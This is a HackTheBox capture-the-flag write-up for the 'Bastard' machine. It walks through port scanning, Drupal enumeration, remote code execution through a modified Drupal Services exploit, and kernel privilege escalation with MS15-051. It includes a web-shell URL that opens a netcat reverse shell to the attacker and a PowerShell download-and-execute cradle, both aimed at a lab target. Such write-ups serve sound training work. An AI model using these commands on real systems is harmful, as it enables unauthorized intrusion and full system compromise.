HackTheBox - Bastard Writeup

tags: writeup HackTheBox Bastard medium OSCP

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Port Scanning

# Nmap 7.92 scan initiated Sat Apr 23 14:11:29 2022 as: nmap -sV -T4 -sS -sC -v -p- -oN Ports 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.044s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 23 14:14:28 2022 -- 1 IP address (1 host up) scanned in 178.68 seconds

Only have a web server and some Windows Ports so we it's time to look into the web.

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Enumeration

If we enter on the web we can see a drupal CMS:

The first thing that i made is obtain the version using a scanner like drupwn.
https://github.com/immunIT/drupwn
With the enum mode i obtained the version and start looking for exploits.

./drupwn --mode enum --target http://10.10.10.9/ 

With this scanner we can obtain some info but in my case the rest of the info was not useful.

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Explotation

Lookingg for exploits that work well without metaesploit I find this:
https://www.exploit-db.com/exploits/41564

This exploit need some changes, searching some info of this exploit i found a web that explains how modify it to make able to upload new files and execute commands.
https://vk9-sec.com/drupal-7-x-module-services-remote-code-execution/

We can execute comands with an URL like this:

http://10.10.10.9/test3.php?fexec=systeminfo

As the same we can execute code we can upload files to the machine, to obtain a reverse we can upload a compiled netcat binary, we can found one in the following directory:

/usr/share/windows-resources/binaries/nc.exe

After modify the script with our ip and the port we have to start a web server with python, a netcat listener and search the URL:

Start a netcat listener:

rlwrap nc -nlvp 4444

Start a local web server:

python3 -m http.server 80

http://10.10.10.9/vry4n.php?fupload=nc.exe&fexec=nc.exe -e cmd 10.10.10.10 4444

With this netcat session we can read the user flag in the C:\Users\dimitris\Desktop directory and also we can read from the explorer:

After that it's time to privesc.

⏫Root Privesc

We can try some methods like enumerating with WinPEAS or manual enumeration but in this case I will use modified Sherlock powershell script that has at the end the command Find-AllVulns to auto-start this function when i uploaded in the netcat session.
In kali you can find a copy here:

/usr/share/powershell-empire/empire/server/data/module_source/privesc/Sherlock.ps1

Once you modify the script you have to start a web server in the location of the file like before and execute in the target with this powershell execution bypass method.

echo IEX(New-Object Net.WebClient).downloadString('http://10.10.14.6/Sherlock.ps1') | powershell -noprofile -

After execute this we receive a list of tested vulnerabilities and some that Appears Vulnerable, I used MS15-051 to Privesc:

I download all the exploits from the github:
/opt/Privesc/windows-kernel-exploits

Unziped the MS15-051-KB3045171 file and uploaded the ms15-051x64.exe to the target machine

The exploit allows us to execute commands as nt authority\system so we are gonna start other netcat listener and start a new netcat connection on the machine:

And after that we have System control and we obtained the root fla.

You can find me on: